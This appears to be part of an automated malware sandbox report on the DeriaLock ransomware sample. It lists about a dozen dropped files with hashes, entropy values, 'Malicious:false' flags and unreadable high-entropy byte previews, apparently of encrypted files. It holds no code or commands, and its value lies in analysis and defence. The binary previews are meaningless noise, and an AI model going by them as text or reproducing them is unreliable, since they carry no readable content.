                                                                                                                                                Preview:*..B..]..[u)...@*.....l}.7a-..2c2t./...7.... 9:;.....\X\=...'......n.....'1..@\{a.\...O..Q....L..l.~rG..PIc..e......#N...e...LEu+,.....JH...?.Z..sF.ko....f.4...........VO....1..~.d....7.a..a.F.JZ..%?..n.tv)......3.J.IdGI.=LK.....gx.%'.w.6z(..t.;...W`.+&.-7.c....C./.....6Sy.u...9...8......*.9w.7i.'./U.......>xzq..u39..fY....e\ZQ.wI.?..hO.9#s.m....a..:.:2. .%S...>.n..Xe.i._#5..^.d.....(. ....W.!.}.B.n.....L.../I......K.........Y.\6.X.w.S..F...A... 1..~....L.:...}KB,.5u..t.........{....~<....AR....?T..!.+...;+<.;...|.....QaJlg.5.g.V..g.C=.....T.....T.S.......Q.P.........r..RUya6mn...I.E....,WD:q].%@.Di....G..k./.,.n..."%.)...f..&)%....R...Z.p{)rZ@z6.....X......... .......b.9 .v.]."..\...y.C.?...x.}.w..Q<.l.C...hYc:.W..hV.>..B...LZ..?"..I...4.P..R...).>.f.!...&....5..d...w.9O.Nc..GD...(..#k. .........].I.D...+...)...MC..`{.z@\..q..y8..L...RSB...)......E..t....;...o..G.$.0c.Y.^.E..maT.@.#0.2.}.Y..S......*..l.S.[...J.X'.{..z..u.`....l....o.
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1040
                                                                                                                                                Entropy (8bit):7.796075793910062
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:Xmk7T6amrld7OMB4DtDpWx31Km2b/6brqSof7HX42rCO8VJJvl+Y:Xr+amrld4BVaL6ydO7HX4pl+Y
                                                                                                                                                MD5:C4F595B789B1F7524DB7CEB3C2DAEAAC
                                                                                                                                                SHA1:B3A5596A8BE59DD1136C74F495BEDEBB75E4B897
                                                                                                                                                SHA-256:E535053A05303EB39BDA8EF572A1BE0516E5DC37D70CCFC47B27351C792891FB
                                                                                                                                                SHA-512:77A070BA8226C03AE0924AF6B7E255285372F54C08B95C14B051BAF673CE7F6BA1FAC5B5D78608142A3A8F60B3D2919E9CF10F531954F5B285752575A539D1C6
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:..H.>.....M.SA...... ``6.L.q|?.E....h.(..3..:..4pl...?^..s4.7..,.(.....S.....H4.." ../......*.....$..|.....$.e.....cU.......YB...`.........r..)F.'j..t...wrz:x..o....Q....++..@&..E.."....Q.PV..".l]...5...tu,..L..xev.n.Y..P..Kw..|s&....FqI....TaL_M..U..@.G$.w...I%.e|zp,'.|....W..E..P..F0."=.4o X.7Sj!._>..&>......HY....w..:...e....@...~..*.{....>f|.$..!..h...:.$..A6W..<.....aBP..6.f..>...Y...Y...<......B.B.h{y......u..C....[.O..qf..w.......@K`.......U..2a.?2.D.ir...j.N..u9'T......g.1..+..........Ve.e...O'd..h..(..."s.4..wX.&...\r1s..t...f.y.a:Frz.s.?w.;.>&.O..$Bn...;.=rC...X.......".i{....[^...`*...3..a..N..\.....c.I..jl8...{..j..;.i%vO,^.(.#...LxY..k..Q.....C..:K.|.c.....'.,.<...`...R.. ..%..7g]..S....3OjH^A.....r\T.&..y..{.....1C.)|uk.(s...i...)n......6.Ta..N[...g..P.....'.&O.oxJ.[a.T.Ld...>...>.........0..N.0y`.:.P4/F...R.....z.\.B.B=.%.'7..Mp].1.=..........{...h},19...++.Y..KH.tN........./...?>.....j#.!.ImM.#]...O.B.#*..r......+.J..U.
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1040
                                                                                                                                                Entropy (8bit):7.8207971381237
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:XlryTiJ783eJxpYF/sXsfib3bsQzZWDcaEtZssKm06H:XlrUbOXcNfMPzZ1sLG
                                                                                                                                                MD5:D2C0090ADDD7125E2B4D16F1C7E0D69A
                                                                                                                                                SHA1:FEF7004AAC003FC0D6F2B675820897F09C8207AA
                                                                                                                                                SHA-256:05BD26604B8BCB6B3467D6B2E84B5B75EE58AD48C672516B53347CCA7DF62B9B
                                                                                                                                                SHA-512:7F3D0F4A4891EBF5923BC7D89B3C5BCF454D51A99F0767F099A36458D0D6C40DB4FE43E534045DE842C02C03ADFFBB652B6321502C3D6770EA87744E264C82E3
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:*...W..eT....:..$..s..UQ.v.U6..|SVb.O.R.o.^....6..........V.~`.I........s}G.Y...-CA..S..[.....%....{.}.*.J.,y}.zj....":...R.-. ....M^.[1...nzK.*.......A....3.....f./^?{...m.T....<.........5.b.2F..L`.....B9.R.346......9.E,.*F..w.%.....9.`.S.G...s.. ..o...|uV.].E.-.PTKH...Wxb9..^#.]O..I...".Q2.8.t.9&...../;`p..w.]B.J.v...B..9d.d..$...O....f.h!.G6.........q..|'.Z`].......K09..V....^@.....T....R..^.TG.?...-.....C..I.y._s8.uH..-.5n....[..T...c'..4y.L.B...T...+...e8..j.^.-...OW@.!.r..((.>...r.q..4..a..Y...Ev=~.XP..k..o_./..."..M..i .....V...u....@...j..(.......l.i.[.q.o...;....&D.U._..d[.t..O.J.....<.hr. {.=...~H._.y...M....u...}...G.P.UC..>..L-/........t9.H.....{F...n.....K.^%./+."...KF.J~.ZO/..F...k..(.......&u.^.jC.3.....S'].Aq.*\.........4.K..U.S..b...........<pI%F! ...a.<s.y.J...N.L...._...{...D.c.........}..hF.......m...'j.J..w..d........A.#.|4.i....S^.k......}.3.o....c{....nwm.K.-^U....|..W../....C..........tZ;.vt....g#.....`....\
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1040
                                                                                                                                                Entropy (8bit):7.821821777395143
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:4y9PanvOBObTTGEcJR2YJONF0UoCjCjCx+qJ:j8nvOsfUxJ2pjCjCx+qJ
                                                                                                                                                MD5:212F169D9C49387EF0C1840D61C826EF
                                                                                                                                                SHA1:8611D2026311658CAFC94A9041690320E08DD6F8
                                                                                                                                                SHA-256:44CFC21C03076127622E5FB6ADC33C797172049E195EB6D69DA9F98C097979B4
                                                                                                                                                SHA-512:91AA8B741DC7D98D9439EA478AE177BC1F49BE650BACDEE1CE6F7E14AFC4AA556A783CB3D76354FB137BB5A6DC5E58B169DD9362BC2C0CC6F6B81320F2842949
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:.S....)...r.*.#..I#....I^W...G...g.nX.....`.}k..I.[..4.C\...B.....jA...^..U.h..5...5......I......].....>......y/.?.\....Ik............=...]!.N,..<\i/.1...Be.Jb".......V.Ik.V.{..v. ..>Gl.Ydc..2...v.3...E....>.D..n..)..4.K...I.U.>M.m.{9.>...p..(........|z..1..6@...r......D...L.&.F/s..d........K.....q!..q.}.<.b..^.....r%q..=..k.#..z.E.NUI_...0....,..N....s. >..9.2J. 'a.om..>/.E..Y....t..PCf.o..>........,.....^..d.5......E.lWLZ.........[.a.....Y.w...y....l...?....|....K..o..R>[...Q(T...Q.A....hq5....e...0..]}.=..l#.v9..u:.|.s.. s..G.z?...L.... .Ud....)-.[...+...b.=P..7.}c...q.C..w...].r+....S..O.).?.&...|e-.....x...Q#8.......r...z/....JR:.).'.j......u.%b3..`.?..X..d%Vs.:. .e.d.VJ.r.7F_..Q..v....{1...z.=L*.....\.h;.q@..+p.m..IM.^...GJb.......I.S.Z5...3ON......"..`.....w....0W...Vl..F..j..H..wW.C.Y.KPZ.&.+ru..w..EG4....yZ.d.}'M....|...h../I................:/..}.w.i5...@.8..'O...CP9..@.)$z:........XW......c..F...U..N.Nd1....P7.i.....(J..`....T.
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1040
                                                                                                                                                Entropy (8bit):7.814102682444628
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:poqH17O3hKW+et0OlsOasAylBOVopZX015EM6ZXppz0thN7VyVbh9zf/Yqd+qLWs:GCsCxL1s5PXu5hKoFEbh9zXzXKqbY4MW
                                                                                                                                                MD5:AC33DE231F13F7B3AD064DF133F807F5
                                                                                                                                                SHA1:DFD0FE62ED33D8B6E175B079A80301E2D8DFF3B6
                                                                                                                                                SHA-256:1FCA0860B84B8A00D05A9C29395A179B71F38DED162A4889EFF842F052EDDA8B
                                                                                                                                                SHA-512:59F9B08D7A2DA270F07013B5CF2711E616EA71F605F80964B929A5614D3B3543FEB8DF28502C6209D9EDDE1A5CC817D20FCE67F4F0FD86F0EB5F58948CFB5627
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:.W....[Np.7..m.r.....M.k..2a9.4...[......&K...9.."..s.zSi..Y.T..>,/...a._=,T....1...]..r..T...6..Mc4...L... H.'.....s!....IG...v....N.]@o..n../V....d.O..... I..).[.''.&.~..g..A./.q...X.:Z...xQn|t...y..3.P;k...x.....?NM.7\.&~.uW.'C.........'....<..T._..."v...$,.;.X..=....F.....qS.5.qj...F....~..)~.a...E.rD..rC....*V.......Z.....+.J.*r..._..E.U.Y.]].Q.oo6.%o.....K.t...S....l,....Td..IJ.o.....(...O.X.+g_.......*.0.4........Z....N...5...+...f"}.'{.k..k@57.3...._.X.6..=.......=s~...[..a O].......$...6T.M..`.Rz..4&.....!*.I...*u..8/....)u..E.\..C.e......... Q~<.oC...}..a|...K.......j..6.Ss.g.C.2.8..P..._Q...>.....^.n|..../..<...p.e...J."........ L.&Lg`9.cxN._1.[.9S..+.g.A*.C.R..@...[u..fupB3......>&.:..i;..JX`N>........t ...L.[..E'.D(.....Ik\.~.dn..#......&+.l.E.}B..............&.......Y.B.V.....#..:..v...I...u.rVH..D.L.a...8.....~.*....I2.eY....`..o<;{*-;..PX..pN*..,&H...V.(S..3..N.....LD..T..V.k?.<.S..li...r/....}.....w$'.Y..6G:Te/...f@iQ....
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe
                                                                                                                                                File Type:OpenPGP Public Key
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1040
                                                                                                                                                Entropy (8bit):7.759663142464938
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:O3ARrQZeMdAFTNH2cHBZ3/XeI/mfKIDTCAWaN55yqi:OQRIeMwN1h1UlDTCXaN55i
                                                                                                                                                MD5:5C8AF6C06F0D39DC7D0B58229552CB12
                                                                                                                                                SHA1:69541BBAF023517C6FCABBD1A688016D24226914
                                                                                                                                                SHA-256:F4CA3A4185C1E10C1F57275BB57B36FDB7851CC793085CE3CC6E594993A3CC1B
                                                                                                                                                SHA-512:AC4283A725305A4A1EF19154FE3758AEF749249DEA71C948635F49722C95AF51E25E6E7B438E4AD26474722364B32F9F91100555FB1324F14CF5C115B2FD0D38
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:.^...=..%.d.a_..J..R=f.z.@~..^........SC...@*......B.k,%.TEw"...1.rH..r...-uP..*.4....a..8.7mNV....?&.u|0.t.....CeD..l..R...KFfF.rHw...V0.........t..v..t...SBd.!..1y.....1...IU.I..Q.L*q_...H.&p....*7.O.cQ..V.?`....s_J*.........W.16(......=/[r"Y...G_.q.m.\wI.Xw......".o.{.|.?...`#.a.:2. .{.c..V...}M.g8i)..2)..H.......%C...h...E........i`Hof}...sK./a......}..*..h.x...k.......x5.........&./.6...>.>.L.D.j.$. 6.>b.8M..)...~W2...E..Kw.....r.|............9>.}.(.i=9..U...J....".k.\~... 7.....e~6e.....jR..:1(..4....r./n....!.U..)Hr.....vS...]...P..............G.._..6lr..*..#q..]r.B.F.*...U.....ok{.}d.l4.)..I..x&.....yYR....P.....f.1d...F..H.y.#.>.....~...k....xK.{.6v.?g.)..V.1..=...^@4.2.y=aM.4=0...Yivu....*c..(%...f4vI.. >^I..H..!k.P...f8.C.........h9...q.>....)....X...t.`...>.I..OL...U.....3#s.8.%.CS.M..M..m....zL.D..._..Q.p.q..}.rU1....I<`.M>..G...H.d........2.....D.a...8.3........c..!.b..[%E....0.|QDmH...."..I....4.9....m49...x.j...n.......{z
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1040
                                                                                                                                                Entropy (8bit):7.824117775615902
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:eFLAUWIzVnFljb1iLHZcjwEU81MhI9+6wn:eFLA2zFjZUCwes6wn
                                                                                                                                                MD5:2EC787EEF9F9EFDBD340A9CB0D3D4D36
                                                                                                                                                SHA1:CB7C1135BFCDC7BF6E1BE69DB342B34665B352D3
                                                                                                                                                SHA-256:EBB9457201990693DC1DEF1C4F1F7462EBB12B3FCDD7C5B67F46E96B5F78C169
                                                                                                                                                SHA-512:481499A356BF304597DE36E87D7AA1797B676FCA506632D41375142A960569C781D00B0679A91DA37E037AADCBC6B79A820B59D0739E537E0D402B947C63CBAF
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:+4.x......`....<..t.uAn...JmUM.Ik(?i.a}-.i<.a.....{..A...=..M..r/..;...Q.i....e[.?l..{....:.e..........+..Z.}Z..S.n..~...dj!.T...}..N+..`81..J..D).a.C...L.z..I.....Y..X..-....E.....uY.......q..Gs........Me2M.e..>.b....|*..(...Gt...y.O....TW]wy/f+..6.bF..........g`.?K...8;L.u.il..r.).J3.O.-<....ku...D=~.W..w..;...AOs.d8.<.k........._..Yrq..>BG..ux..6..A.....3]k.J~..5.U.q.A.\0^;X\k..m.b2=.@P.........+Mqj....'j.Mc&...r..7o../.u.f.DC.vo../r...qw..c..&..2..B..e..6.B.:..`....E.3.*.<...rX.......Ef..B...r..Q4\..H....(..N...[+....=...Xa.O..3.....CV.;...1..q(=y^...............v....j.5AG.#k,......%.m......N..NV?%..[+Z+....:\...zK.k...O......."O8].e...(zd....#........\Ebe.......t..n.K.>.."{8f.......4...F...1$...R ^........+.V*&...Qpo.b.2.gy.7'.oY.hu.......D.Kf....j..i^=../$I2.?...Gb....f...&k`X........F....... /.....4./.........].........j.Q..=.}o..[.O...z%IE.......N...E@... C..(..(6.4.....-L...?%,.gH}..3).K.U..&.Dy;..h.........phhR..O9.S2?Q
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1040
                                                                                                                                                Entropy (8bit):7.847204921844122
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:2A1E7u0yTYYrDlfuyWKexU6MRf/Qmi+QEyD9nNKBLWIloJUr:RE7dmBWDU6eDzQ7xNYLhoer
                                                                                                                                                MD5:E9AC3DA279EC96ED3008FCDE2713AC89
                                                                                                                                                SHA1:856C4A23A935B43AD187E05518649C7BD33DD285
                                                                                                                                                SHA-256:96904F589666040CC531E605245F96F8F812B08A45787505608E23BBB47DC83D
                                                                                                                                                SHA-512:7425274640391975CECEA331C19B32F117F948DCBD972CC6C1AB1728241D3AA6C288A74DD0D4A8EAFC68C088348A9104A7344C79981B938AEAD432FF9730BC71
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:|$.....Fc.%F......J)...GE...+..G..q.3..dr0ev+....o.x.B..A......q4T..[...].f.y..E.m......4..=..R.p!6*]P..M......2.T..fw...G...M..<m..D......Q..+..&...d.....r..*.J.......s.....+......y..JH&Wn.6.{m../.U.P....y.....6.$.5x....2[.v.F\../]..>.....).s.. ...R.X.j.$-....Q.X...H..pz.~f".cLT....L.F.....vb..Qm.)..JlU....0}.#...6j..IM.f...w/.U.#3.]..Rh..LL..o0.~&=..b'.}^.......A..e........?P.E..N.%lVO.@.g..,XQ...Z.WwD...W...9.[|o..&.....c.w..L..:.&...n.#....;`.pU.h......c..qD........9..}1J.._.p......U./NdU...%e...?.|...!...$iK>._......]j.<...e&.).Z....7. Io..V..<.JbKW.F...C.... .b.B....a.Y'.J.@.O.....@...C.\%.KA.......1..7.a...Qpy..LV.s.o.3 ...Y...|X....Ht.z....L(c.^..*....&.nlu....Rt...r.ED.Q.P.".8..5..ZSCY.*.f.x.q..........5..2...'._^uG5...eL6.\?....U. .....z..,@...........p.lQ..}>..r.*.;=..Lq...a.44...L..8.eg...2..62V9..`wm.5lF.b....|.ieP..JB..m+n....-.......,3:.(.8...... .....O....j7cg....k.]D.k.e.s.h.........|...21.\b.y.s...f5.kE....Y{..(xc*...7L"..
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1040
                                                                                                                                                Entropy (8bit):7.789234786585808
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:Uwd5+FZxwqJto/h6BVx4ukij7dPOYpgPM/83:/HsZxwyykBVxPtYM/83
                                                                                                                                                MD5:6E34C5E15F3EC76344D5D5E9AED931AD
                                                                                                                                                SHA1:9A4CE407621E47F1E73909AB4D55F67098D1205E
                                                                                                                                                SHA-256:CC359D33417386CBA92A13BE8C8A5534D01CDD6BED6DF04E917E4A928F9CE020
                                                                                                                                                SHA-512:EDD4A3C06E983D9B5BD06458E3554FCBFF938F4BECE8E896093D44C920199B1C3A34907BB0602E42375EAE2CD405A3DB799C6F8F87BBC33034AC9FC23CF78B59
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:,..^...9........^.^.......J.wF..,o,....+.&..!E....^.1BkX/dI..*6+....V.{.k.r..ec.F..8q.J^j#..x[...:..0.../k{:Ih*..>......G.....X`......"..)........t..S^."<...v*..|.3oR|i}..aQ..K...8.. ..&+bS.+..........4....x.......*..w..Y.C:....H.....4jd..@I...c..0j..k.a.....(.....sw.i...r/`.D..d..YC].%B...Ew..1...(!.*.\R.f.S..!...[Px..N.[..W..W&M~n....s.;Pf.6.....)XZ..V..w$w..}.+.....tlNX....s...IA....~...x....:.8.M.p.e.7.........N.s.`..7f......~G#/).-..0Lc..`N.~.|.l}..S......2}J..&kH.........Vo.kA....S..|T.3.6....x<.....l....OJ........4......@ .@.......s.*=.X..\k.I/.'.<..k..Z....kd.E..M..9.kl.x.E.I.!.~.8FS......%.O.B...X.?Q$..X..,Z.>..........sz.hA...j.. .... `.|..m...Xe7$|(?.2.x.y.)X..A..l..cg......o..).)..v......f..5Z.".....~..)K.4..(=N...N....]........,.....-.....^..!.h.8X... ........o..<4............y1Z.\A(l..?n>.8rLEh#..E=^.l|))..HVw....1....)^...(.&/4E.Y..Hbu....l;.......:.l.h..,.+.wJ.|.u.s#:....&.._..k...3..q$.....f..HM..z...I..T..jX...
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1040
                                                                                                                                                Entropy (8bit):7.8204878195833025
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:nmc/LwDMd0wh1oGMg41xCCobWN7+TC3BrwWQbpW1z:nmdqHegcxCLaN6TSNwVbpW1z
                                                                                                                                                MD5:C67DB051F9697EDBB2AA64F7DC0ABE13
                                                                                                                                                SHA1:58D3BE181DA0AC517A8C36D975995A73B557B6A5
                                                                                                                                                SHA-256:F140E29A253722B7514226D62C28ABF2C6E6E408855281E2B267088FFEB96318
                                                                                                                                                SHA-512:4D6B4E7ABDE59706F45FB4F6FE6CC1401DDDC841ADDDC4DF0EC7AABD638ED3E500313BB5052216807B09A7EB677C17B4CE4EFF7DA86E19438D2EBFC3FA1ABA05
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:.B(.z>..]e..d.c...CY...s.'.z..w...]...B.5^..B.B.|....S..7Y..;!l...T\g~<. ...b...d...|.KPhf! ..E..W.N..?.].".Y.l...b..[..U. )p^./."..e..lJ.t...k4.i....u..Li7,.^..<.$U^{My....g..1..5..+...H........n.<...}...T.m..P.;W....N.U.j.....6...zU.Y..S.Z..^.G.w.&~....4........i-%l....1.....AU..9....e......>!LxtL._......./.LK........]@b.ACYm....d.j.'....r+."&9`..o.....Z..FP/\...X.7WQ.e...p...I(-_.D...LT..=f.e.w...`h[p...:.OR......bO.0.1............t..j3..3._.9]..@h.......i.z+.N.i.&V[.S...tj.5.Y.K....':.m.Fh...[P.L9..@...h...=y..(..* r.(x..h.......B.v.aSz.qb....wm..D%..j..m.0..U%W..d.'....M.C...h3tB....Q.`......5..G...$.=D].G.i.............7.BG.....&!.;:..[B:......x.....z...#..z9'0..../..j.W'.........W.qq..k.L?..v....=...=.......[.x.?..&.mf.....@&&...X~-.-.z..1y-..7.8D...=.x..../...].!.l.'7...w....t....F...u.i.lXPo.6...4.xv.b...y.0.5c..*....F..U..Oo...M4u{7..c..f.fo..S..hJ..E.!]1..K..Q.[U....0$q\.]..o..0..:...G..<..m3...^.r.rwJQ)....~a8.q
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1040
                                                                                                                                                Entropy (8bit):7.817422513195666
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:1S1kk7NtfU17GhgS02HohA+ff/wip1iaDjCDcAoZxk/TPk/G:16kk/fUEu2HsffYipUIrw7
                                                                                                                                                MD5:E94DB0DF0CF2E68C3C6E3F191A9304B2
                                                                                                                                                SHA1:CE85CD342704480DD4F272C00AEEF40CCE238B13
                                                                                                                                                SHA-256:EAA415186FF217587DC9231021C5C6D3B8C480E36580FEBE51A3BB392C23D23E
                                                                                                                                                SHA-512:8E2BC4DA189C2408241C1BAEE0A364A7E3E1554741341D4744B148D8CCF13E03636842910A708E6A3FA99367D8F4D56068A476E839C7DC12101B872B5A900EA8
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:....h....:c...za/UQ.O..)_x}.{~.D...M.J.^.M..g.(+.UZ....$b*H%..t..GG?/<..;.bq_.]..3V.R....'.7W..2..,$~....2.C"o.l......"!KM......u....h.%.+7....6tA..Y...u.%{.z!^A+>Bg........6.S.j.N.W..@.d.cL..{....y.[...............em.._#.z&.K*K,.gk.6.....P....b.9.h..Z.C..].J.gx.K....gl0.A!..pt;.f..x.)W.............|.....j......O&..h.E..J64.!.^..&....?...v.*.53..cf2..n..M.....p/.!<n+.SYR....H.W...b..X..:..2[M(GD..V..=...z.......w.!<..._T..K.2H.bs..|..c........9q ....n...y-./...I...4:U..A..O........D..d...l2...,9...H....kS.F.E[.O.[.&.i.nq.}......!..T.Hy.4bSu....".Oaf......8........-..hM.{i....4.4._.2..$vl.8...>...K.....^)..E..@,.,^.ga........vb.D0.l..^h.2v..BN...a..5.7..@y..z...8".....(....l.....\.'.F....,..........R..%..}g.M..t...:2.....1....x..n.........mB..:U.S...$..3....$.........>.T..........h.w6..B...z.Z..`.b?|......w.g$e....L.M^.....#...t.|...O..9.T+..^.|,..&\!..oe./.....<\.r.G..7...........e......M.x.,..C.P...~...24.[..x.......S.ili8>......
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1040
                                                                                                                                                Entropy (8bit):7.8031876195048335
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:rqGLKg3tGagT1wkubRP1T3UIDzryRG+QJ/WLC2uemBJs/ifXw:rqGXEagT1UT3bryW9WLhfq3fXw
                                                                                                                                                MD5:72B498421D872EE481AD4231FA8BBE0C
                                                                                                                                                SHA1:6540F3969A9585C850EF6A29BBAAF8E9FFD6E66E
                                                                                                                                                SHA-256:DD01F124E9451DD1016583C2E54CCEC3434F06D0D6FBCA613DE0A960B6DAA57D
                                                                                                                                                SHA-512:3221FBA34EDD66259E6874B0C885E721207BE411CBDEB6B806AA3EFE3F20932566F1D6A8D67B17E9E3C49EBA055823638BE5760DA3FA98CF9361BF12676AEA9D
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:.A6..............w.;....R..(..t#Hw.X...,Y...,Q.!.`..bX3..<..f..%c..Ce..{...HPf.:...7.7.H.m...|b.V...u.oW.....T...^.N......3[..2`*X.r.U.lj+8...@H..#.e...z3."q.....2....^mc....d.mJ.F;.~...Ar.........j..........*..:.9....%Y..;..".QS,?l,b..f....vHrQ....N.K..."..../.>Q.6...}.J.X../Y/a.m.....9./b.#......H.s^...V..TO.j.4..Z". ..[.G..H..!..yu.....;....QEI]..2..Q...B....2c&.5S ....@....z.F1i.......z.pN...........W%u.,~.JJ.l.....\...zH.P../.......D]u./|....89......D..0.I%".`#._.r.....^Dku......Cr.4..?RK..ZI7.X=9-p.#^...'..qL(..m[.......X..-eVl.&:..L.....c...<(.I..a.......I\Y.E..<..4.X.@E^.Y.d..=..tE.hU,.;'.U.......q.u...>U...35...\w..m.u...D.#`...].|=o,.}.....u.....h].3...f....xqr/...ji.A.....bl.M|.n_.......y.n.T%..P..`../_Cn.tnz.YXU....*..t....I[..YP~...%XFV...'.0...(....[P.ul........=.....}...m.)O.<))..^!/.}.iCl...W.t{.D...o...UU...fK1.=.?.y....p....]S)1..Y...}.M@..........c$...q>....+X..?JJim..(..z.C=.;....."......m_.4N....)..=.._..FZ...SE..
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1040
                                                                                                                                                Entropy (8bit):7.817780302242787
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:2qadgKbk49iNhEAHOgt/tEuEvDSsVILRh5:fuAXsAPEvOsqp
                                                                                                                                                MD5:A458F415A4EDFFC6737F7AF4FDB78460
                                                                                                                                                SHA1:5B17EAA1F23B7A222C9DF86E9D3079F736F086E1
                                                                                                                                                SHA-256:C5D0D9D1B3B90A270881FB58160154C5FC53AD2414DA9DD5331D0B676EF5D8A5
                                                                                                                                                SHA-512:BB8A60B778D14FC2BB232BCB399184F2479F72F27D8AA92382CB7A9C317FA83805F1B2FED507DD69D642E1B56F23ABC32F430404EBCA23137FD14BA815AF38D4
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:.h-.%.....Vc..'.0.,..d`>..6.$seL..........z...@+..D*v..F..H..uj9...u<.^.c.......23.[..Sd_..........G....U(.wq...N..~.;..:s..E........V#Y..xG}......D..F..+..u..F...Q...vu.i.O... ...@:F..K........r..n.].bR..f.....wP.2.F..5.5f..5]..L..@.....YO..S.,.8(K.f...#.....=b{&16..a..t....*.u..$'.v..t.O.....r..B...Q"u.../..$X.q..y'....4..K...3.b...i..... ..?t.K.N.|l.dmNe..p....@7..)A~[. .~.b.......!...ou..m'J.K.D/.2.1........:RS.._.....P...R.tB.t.3....-........./&...:.b#$.lB.9...Hi....N.....t..W.r...c..wz...b.2......8B).T....3b^.D-..@N0)..W.+&.......i.r.9.(J...b.$.......CR......^...$q.R.6....'...`ZV$.. .xf...Jw...+...4.).f...{.U.e....~..u.G....D..F..F..m.Z...S...,..(?>v...xM..$VS4....EH.....O..O\....a..&H..n.^1.*i..._..C.x..d.e. .{1..<........X..5...Lz..y.A..4.q.jgSr.K.I|=V(.i..+ .M^3..G..X]3.&jiS.......O{.#...Q..v.X...,.j....w9.$............Y_..+...t..N.P$Dw.....L.f.7.-.AP..az.p+,...4is.....s...(...3..5x../.>]%....C...?F..w.R......^..D.>D.J....3.
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\gpgn0u0y.kpm\Endermanch@DeriaLock.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):416
                                                                                                                                                Entropy (8bit):7.507484107545686
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:y7BRaUG0xaCgour7OKpEBdTRAsimV+6NJ+CtWaWk3U8YZScPOHNkx+n2xVncGg1X:AuiMrMhhtXJxWaWk3UNZSWkfgVn7cdJ
                                                                                                                                                MD5:56544FF9A9A659E62E4FBACD214606F5
                                                                                                                                                SHA1:CB2ED2140679A640E1AF0C81732A83CEB78F9BE7
                                                                                                                                                SHA-256:4E80BF07432C5E6C9D9FF2112B6DD8D5705C4261B724F930F6D39A0692875D4D
                                                                                                                                                SHA-512:F58960722EE499FE8CE5E6D67D12B21E79D63C632C08A83B742836DA9E832EA5D81DFC5BA06A4489E29B5AA83F57C1DF14699AEAF92DF74E6FE57C25E1C03B67
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
